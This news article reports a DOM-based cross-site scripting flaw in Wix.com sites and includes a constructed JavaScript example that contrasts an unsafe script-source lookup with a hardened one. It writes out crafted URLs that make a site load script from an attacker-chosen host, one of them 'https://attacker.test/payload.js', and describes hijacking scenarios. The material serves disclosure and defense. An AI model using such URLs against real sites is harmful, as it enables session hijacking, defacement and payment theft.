Update: Cloud-based web host Wix.com is vulnerable to a DOM-based cross-site scripting vulnerability that can give attackers control over any of the millions of websites hosted on the platform.
“Simply by adding a single parameter to any site created on Wix, the attacker can cause their JavaScript to be loaded and run as part of the target website,” according to Matt Austin, senior security research engineer with Contrast Security.
Austin said Wednesday the vulnerability was still unpatched despite repeated attempts to warn and notify Wix.com since early October. On Thursday Wix.com representatives sent Threatpost a brief statement saying the problem has been solved.
“We take the security of our customers very seriously. After thorough examination we can state that the issue has been addressed. We do operate a formal bug bounty program and are taking steps to widen the community,” said Matt Rosenberg, Wix.com spokesperson. According to Wix.com’s own estimates, there are 86 million users of its platform.
Unlike traditional cross-site scripting exploits, where the server echoes a payload into the page in response to an HTTP(S) request, DOM-based XSS attacks modify the Document Object Model environment in the victim’s browser so that the site’s own client-side script ends up executing the malicious code, according to OWASP.
Austin explained two reflected DOM-based XSS attack scenarios. One involved a Wix website owner who is lured into visiting a malicious URL loaded with specially crafted JavaScript that can hijack the target’s browser session. The attacker could then assume the browser session of the authenticated victim, allowing the attacker to perform any actions as that user. This includes modifying a Wix website controlled by the victim, giving website admin rights to a third party or infiltrating a Wix ecommerce site to steal credit card numbers.
“Administrator control of a Wix.com site could be used to widely distribute malware, create a dynamic, distributed, browser-based botnet, mine cryptocurrency, and otherwise generally control the content of the site as well as the users who use it,” Austin said.
In a second scenario, Austin describes a user being lured to a Wix website by a specially crafted URL. That URL could load JavaScript into the targeted Wix.com site via a DOM-based XSS attack. In one scenario a Wix.com-based fan site could be modified for a specific browser session to serve up malware downloads instead of music downloads or reroute PayPal payments to a third-party account.
In examples of the DOM XSS attack, all an attacker needs to do is host malicious JavaScript on a server and point to it within a URL. For example: “http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”. In this example the appended query parameter “?ReactSource=http://m-austin.com” causes the site at “http://matt4592.wixsite.com/music” to load script from the attacker-specified host, creating the conditions for a reflected DOM-based XSS attack to deliver a payload.
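The root cause the article describes is a client-side script that takes a script location from a URL query parameter and loads it without checking where it points. The following is an added example written for this article, not Wix’s code and not Contrast Security’s proof of concept: the parameter name `ReactSource` comes from the article, while the function names, the fallback bundle path and the allowlisted CDN origin are constructed for illustration. It contrasts the vulnerable lookup with a hardened one that only accepts `https:` URLs whose origin is on an allowlist, and shows the `script-src` Content-Security-Policy that would give defense in depth even if the check were bypassed.

```javascript
// Added example (not Wix's or Contrast Security's code). Demonstrates the general
// DOM-XSS pattern: a URL query parameter chosen as a <script> source.

// Constructed allowlist: the only origin this site is willing to load scripts from.
const TRUSTED_SCRIPT_ORIGINS = new Set(["https://static.example-cdn.test"]);

// Vulnerable pattern: whatever the query string says becomes script.src.
// An attacker who can get a victim to click a crafted link chooses the host
// that serves the script, which is exactly the flaw described above.
function resolveScriptSourceUnsafe(search) {
  const params = new URLSearchParams(search); // leading "?" is ignored
  return params.get("ReactSource"); // null when absent, else attacker-controlled
}

// Hardened pattern: parse the candidate, require https and an allowlisted origin,
// and otherwise fall back to the bundled default. Relative, protocol-relative,
// javascript: and data: values all fail the checks and return the fallback.
function resolveScriptSourceSafe(search, fallbackSrc) {
  const params = new URLSearchParams(search);
  const candidate = params.get("ReactSource");
  if (!candidate) return fallbackSrc;

  let url;
  try {
    // A base is required so relative values parse; its origin is deliberately
    // not in the allowlist, so relative values are rejected below.
    url = new URL(candidate, "https://placeholder.invalid/");
  } catch (_err) {
    return fallbackSrc; // unparsable input, use the default
  }

  if (url.protocol !== "https:") return fallbackSrc;
  if (!TRUSTED_SCRIPT_ORIGINS.has(url.origin)) return fallbackSrc;
  return url.href;
}

// Defense in depth: a CSP that limits script sources to self plus the allowlist,
// so even a bypass of the check above could not execute a remote script.
function buildScriptSrcPolicy() {
  const origins = Array.from(TRUSTED_SCRIPT_ORIGINS).sort().join(" ");
  return `script-src 'self' ${origins}`;
}

// In the browser, the resolved value is what would be assigned to a new
// <script> element's src; in Node the functions can simply be exercised directly.
const DEFAULT_BUNDLE = "/static/app.js"; // constructed default
const crafted = "?ReactSource=https://attacker.test/payload.js"; // constructed input
console.log("unsafe:", resolveScriptSourceUnsafe(crafted));
console.log("safe:  ", resolveScriptSourceSafe(crafted, DEFAULT_BUNDLE));
console.log("csp:   ", buildScriptSrcPolicy());
```

The allowlist check compares `url.origin` rather than doing a string prefix match on the raw parameter, so values such as `https://static.example-cdn.test.attacker.test/` or `https://static.example-cdn.test@attacker.test/` do not pass. The CSP is the backstop: browsers enforce it regardless of what the page script does.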
Worse, Contrast Security said, using this flaw a cybercriminal could expand on the attack, turning it into a worm that spreads across all Wix sites, similar to the notorious 2005 Samy worm (also known as the MySpace worm), which was designed to propagate across the social-networking site.
“If the MySpace worm is any guide, taking over all the millions of websites hosted at Wix wouldn’t take very long,” Austin said.
This story has been updated Thursday 9:00 a.m. ET with a comment from Wix.com’s Matt Rosenberg.